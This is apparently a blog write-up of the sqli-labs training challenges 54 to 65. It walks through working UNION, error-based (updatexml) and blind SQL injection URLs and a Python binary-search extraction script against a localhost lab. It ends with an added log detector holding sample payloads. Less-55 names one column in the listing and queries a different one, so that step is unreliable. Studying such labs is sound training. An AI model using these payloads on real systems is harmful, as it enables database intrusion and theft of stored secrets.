Sky's blog

SQLi-LABS(Challenges)(Less-54 ~ Less-65)

Word count: 2,861 / Reading time: 14 min
2017/07/23

Preface

Finally on to the last part; the challenges here look like they should be more interesting.
A quick scan of the challenge tree shows they limit the number of queries, so they should be more challenging~
It is also the first time I have met challenges that limit the query count 233333

Less-54

10 attempts in total:
1. http://localhost/sql/Less-54/?id=1'--+
The quote can be closed.

2. http://localhost/sql/Less-54/?id=1' order by 3--+
3. http://localhost/sql/Less-54/?id=1' order by 4--+
There are 3 columns in total.

4. http://localhost/sql/Less-54/?id=1111' union select 1,2,database()--+
Got the database name: challenges

5. http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges')--+
Got the table name: 2z2ky7u3h6

6. http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_name='2z2ky7u3h6')--+
Got the column names: id,sessid,secret_VT7N,tryy

7. http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(secret_VT7N) from 2z2ky7u3h6)--+
Got the Secret Key: N5AhP68HDC7VeLh522yFDDXh

Less-55

Tried four times:

http://localhost/sql/Less-55/?id=1' union select 1,2,3 --+
http://localhost/sql/Less-55/?id=1" union select 1,2,3 --+
http://localhost/sql/Less-55/?id=1') union select 1,2,3 --+
http://localhost/sql/Less-55/?id=1") union select 1,2,3 --+

None of them produced any output.

Fifth attempt: http://localhost/sql/Less-55/?id=1) union select 1,2,3 --+
Output appears, so the parameter is wrapped in parentheses.

The rest is the usual routine:
6. http://localhost/sql/Less-55/?id=1111) union select 1,2,database()--+
Got the database name: challenges

7. http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges')--+
Got the table name: wu04ztcpuf

8. http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_name='wu04ztcpuf')--+
Got the column names: id,sessid,secret_VT7N,tryy

9. http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(secret_56PJ) from wu04ztcpuf)--+
Got the Secret Key: H1CMQXkyRDycn957TvopveMb

Less-56

First try:
http://localhost/sql/Less-56/?id=1111") union select 1,2,database() --+

No output, so tried again:
http://localhost/sql/Less-56/?id=1111') union select 1,2,database() --+

Got the database name: challenges
After that it is the usual approach again:
3. http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges')--+
Got the table name: w8wm3uvrh8

4. http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_name='w8wm3uvrh8')--+
Got the column names: id,sessid,secret_SRYD,tryy

5. http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(secret_SRYD) from w8wm3uvrh8)--+
Got the Secret Key: 7AgbCSl8VERK8iX9fcP3D9t1

Less-57

First try:
http://localhost/sql/Less-57/?id=1111 union select 1,2,database() --+

No output, so tried again:
http://localhost/sql/Less-57/?id=1111" union select 1,2,database() --+

Got the database name: challenges
After that it is the usual approach again:
3. http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges')--+
Got the table name: iva95whf7f

4. http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_name='iva95whf7f')--+
Got the column names: id,sessid,secret_EF5I,tryy

5. http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(secret_EF5I) from iva95whf7f)--+
Got the Secret Key: 9zrcgg276FWT91nl0qnaP412

Less-58

First attempt:
http://localhost/sql/Less-58/?id=1'
Got the output:
to use near ''1'' LIMIT 0,1' at line 1
So the parameter is wrapped in single quotes, and this is error-based injection.
Second attempt right away:
http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
Got the database name: challenges
The rest is the usual routine:
3. http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+
Got the table name: b392at8va9

4. http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='b392at8va9'),0x7e),1)--+
Got the column names: id,sessid,secret_Q7PX,tryy

5. http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_Q7PX from b392at8va9),0x7e),1)--+
Got the Secret Key: lCEe8mTAp48IQmZV28cnEqdb

Less-59

First attempt:
http://localhost/sql/Less-59/?id=1'
Got the output:
to use near '' LIMIT 0,1' at line 1
So there is no symbol around the parameter, and this is error-based injection.
Second attempt right away:
http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
Got the database name: challenges
The rest is the usual routine:
3. http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+
Got the table name: nuok0jyq7p

4. http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='nuok0jyq7p'),0x7e),1)--+
Got the column names: id,sessid,secret_J6JV,tryy

5. http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select secret_J6JV from nuok0jyq7p),0x7e),1)--+
Got the Secret Key: L2kpGEPJFsFBthbtIuKP3EkC

Less-60

First attempt:
http://localhost/sql/Less-60/?id=1'
Works normally.
Tried again:
http://localhost/sql/Less-60/?id=1"
Got an error:
to use near '"1"") LIMIT 0,1' at line 1
So the parameter is closed with a double quote plus a parenthesis, and this is error-based injection.
The rest is the usual routine:
3. http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+
Got the table name: abo8uemjke

4. http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='abo8uemjke'),0x7e),1)--+
Got the column names: id,sessid,secret_XE9D,tryy

5. http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select secret_XE9D from abo8uemjke),0x7e),1)--+
Got the Secret Key: 6LBcSsOMUZ7wGeDKOq10xMNv

Less-61

First attempt:
http://localhost/sql/Less-61/?id=1'
Got the output:
to use near ''1'')) LIMIT 0,1' at line 1
So the parameter is closed with a single quote plus two parentheses, and this is error-based injection.
Second attempt right away:
http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
Got the database name: challenges
The rest is the usual routine:
3. http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+
Got the table name: jw06puceok

4. http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='jw06puceok'),0x7e),1)--+
Got the column names: id,sessid,secret_C2IB,tryy

5. http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select secret_C2IB from jw06puceok),0x7e),1)--+
Got the Secret Key: h5jg06c70zgD1EzDtm8ny6FE

Less-62

Seeing 130 attempts, I immediately thought of blind injection……
The attempt count here obviously won't let you run an ordinary blind-injection script.
Clearly binary search…… which puts fairly high demands on the script.
As far as I can tell…… the only difference between Less-62 ~ Less-65 should be how the parameter is closed……
So I won't write up the remaining challenges one by one in detail.

First take stock of what is known:
Database name: challenges (known)
Table name: unknown (length: 10)
Column name: secret_ followed by an unknown part (length: 4)
Secret Key: unknown (length: 24)

In other words, our 130 attempts have to guess 38 unknown characters, so basically not a single one can be wasted, because each character gets only about 3 attempts on average.

Personally I don't think that is realistic…… a binary search has to pin down one number in 33~127…… how could 3 attempts be enough?
For example:
Say the answer is 45
1st try 80 (too big)
2nd try 56 (too big)
3rd try 44 (too small)
4th try 50 (too big)
5th try 47 (too big)
It takes about 5 tries to just barely get the result…… guessing 38 characters this way…… definitely not enough 233333

Later I realised…… there are only digits and letters here, so the range 33~127 shrinks to: 48~57, 65~90, 97~122
For convenience I put them all into one array and cobbled together a script, but I still could not keep the query count within 130…………
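A counting argument, added here and not part of the original post, for why a budget of 130 yes/no requests cannot recover 38 characters from the 62-symbol alphabet above: each boolean probe answers one question and so yields at most one bit, which bounds the number of probes from below by the information content of the unknowns.

$$
|\Sigma| = 10 + 26 + 26 = 62, \qquad
\lceil \log_2 62 \rceil = 6 \text{ probes per character in the worst case, against a budget of } \tfrac{130}{38} \approx 3.4
$$

$$
38 \cdot \log_2 62 \approx 38 \times 5.95 \approx 226 \text{ bits} > 130 .
$$

Even if the table name and the column suffix are restricted to the 36-symbol sets seen in the names above (lowercase plus digits, and uppercase plus digits respectively), the bound is $14 \log_2 36 + 24 \log_2 62 \approx 72 + 143 = 215 > 130$, so a boolean binary search cannot fit the budget no matter how the probes are arranged.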

# Author:sky
# -*- coding: utf-8 -*-
import requests

# Search alphabet: digits (48-57), upper-case (65-90) and lower-case (97-122) letters
dic = [chr(c) for c in range(48, 58)] + [chr(c) for c in range(65, 91)] + [chr(c) for c in range(97, 123)]
search_attempts = 0

# One URL template per comparison; the sub-query and operator are filled in first,
# the character position (%s) and ascii value (%d) on every probe
BASE = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((%s),%%s,1))%s%%d--+"

def make_payloads(subquery):
    return [BASE % (subquery, op) for op in (">", "<", "=")]

def BinarySearch(payloads, n):
    # binary search over dic for the ascii value of the n-th character of the sub-query result
    global search_attempts
    low, high = 0, len(dic) - 1
    while True:
        if low > high:
            raise ValueError("character %d is not in the search alphabet" % n)
        center = (low + high) // 2
        k = ord(dic[center])
        url1, url2, url3 = [p % (n, k) for p in payloads]
        # note: only the matching branch counts, so search_attempts counts search steps,
        # not every request actually sent
        if "Your Login name" in requests.get(url1).text:
            search_attempts += 1
            low = center + 1
            # the page rendered, so the wanted ascii value is larger: keep searching to the right
        elif "Your Login name" in requests.get(url2).text:
            search_attempts += 1
            high = center - 1
            # otherwise the wanted ascii value is smaller: keep searching to the left
        elif "Your Login name" in requests.get(url3).text:
            search_attempts += 1
            return k
        else:
            raise RuntimeError("no probe matched; check the closure or the attempt limit")

table_sub = "select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges'"
flag_table = ""
for i in range(1, 11):
    flag_table += chr(BinarySearch(make_payloads(table_sub), i))

# the column is secret_XXXX, so only positions 8-11 are unknown (limit 2,1 picks the third column)
column_sub = "select column_name from information_schema.columns where TABLE_name='" + flag_table + "' limit 2,1"
flag_column = ""
for i in range(8, 12):
    flag_column += chr(BinarySearch(make_payloads(column_sub), i))
flag_column = "secret_" + flag_column

data_sub = "select " + flag_column + " from " + flag_table
flag_data = ""
for i in range(1, 25):
    flag_data += chr(BinarySearch(make_payloads(data_sub), i))
print("表名:" + flag_table, "字段名:" + flag_column, "Secret Key:" + flag_data, "共计查询:" + str(search_attempts) + "次")

Tested it a few times:

表名:nbub3gswin 字段名:secret_VA5S Secret Key:z0a4nKHaAkpZaNSqymsmq3JC 共计查询:194次
表名:392at8va9q 字段名:secret_7PXW Secret Key:CEe8mTAp48IQmZV28cnEqdb8 共计查询:192次
表名:w2xqu18tr8 字段名:secret_WBQV Secret Key:c3HZylgmhHQ674ck67rQzsDN 共计查询:189次
表名:rsa08mddcx 字段名:secret_CQYO Secret Key:gjGChmNisVWaJ7WlaLjhoO0P 共计查询:195次

Roughly what we estimated: each character needs about 5 queries…… around 190 in total, which is just about enough to get this challenge done……
I'll improve it once my skills get better and see whether I can break 130~
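As an added example (not from the original post or from sqli-labs), a defender-side detector that runs over constructed web-server log lines shaped like the requests in Less-54 to Less-62 and flags UNION, error-based and boolean-blind probes, plus any client issuing a burst of blind comparisons; the log format, client addresses and the burst threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the injection families used across Less-54 to Less-62: a comment
# tail on closure probes, UNION enumeration of information_schema, updatexml()
# error-based extraction, and ascii(substr(...)) boolean-blind comparisons.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "boolean_blind": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "comment_tail": re.compile(r"--(\s|$)|/\*"),
}
# Assumed Apache combined-style request line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(path):
    """Return the names of all signatures matching the URL-decoded request path."""
    decoded = unquote_plus(path)  # %27 becomes ' and the --+ tail becomes "-- "
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def analyze(log_lines, blind_burst=8):
    """Flag each suspicious request and any client running a boolean-blind burst."""
    findings, blind_counts = [], defaultdict(int)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, _method, path, status = m.groups()
        hits = classify(path)
        if hits:
            findings.append({"ip": ip, "path": unquote_plus(path), "status": int(status), "hits": sorted(hits)})
        if "boolean_blind" in hits:
            blind_counts[ip] += 1
    bursts = {ip: n for ip, n in blind_counts.items() if n >= blind_burst}
    return findings, bursts

# Constructed sample log (not real traffic): one benign request, the Less-54 closure
# probe and UNION query, the Less-58 updatexml() probe, then ten Less-62 style blind
# probes from a second client that differ only in the compared ascii value.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jul/2017:10:00:01 +0800] "GET /sql/Less-54/?id=1 HTTP/1.1" 200 900',
    '10.0.0.5 - - [23/Jul/2017:10:00:02 +0800] "GET /sql/Less-54/?id=1%27--+ HTTP/1.1" 200 900',
    '10.0.0.5 - - [23/Jul/2017:10:00:03 +0800] "GET /sql/Less-54/?id=1111%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27challenges%27)--+ HTTP/1.1" 200 950',
    '10.0.0.5 - - [23/Jul/2017:10:00:04 +0800] "GET /sql/Less-58/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ HTTP/1.1" 200 980',
] + [
    f'10.0.0.9 - - [23/Jul/2017:10:01:{i:02d} +0800] "GET /sql/Less-62/?id=1%27)%20and%20ascii(substr((select%20table_name%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27challenges%27),1,1))>{60 + i}--+ HTTP/1.1" 200 900'
    for i in range(10)
]
```

Calling analyze(SAMPLE_LOG) returns the per-request findings and a map of clients whose count of blind comparisons reached the threshold; the threshold is what makes a sequential probing loop stand out from a single stray request.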

Less-63

Still a blind injection challenge.
Same as Less-62, only the parameter closure differs.

Less-64

Yet another blind injection challenge.
Same as Less-62, only the parameter closure differs.

Less-65

The last one is still a blind injection challenge.
Same as Less-62, only the parameter closure differs.

Afterword

I have finally finished the SQL injection "bible"; it turned out different from what I thought when I first started. Back then I expected it to be very hard, but most of the challenges are educational in nature, with hardly any truly real-world ones; none of them filters thoroughly, and each can be solved in several ways.
Still, this round of hands-on practice taught me quite a bit; the challenges are very basic and well suited to people just starting out and building their foundations~
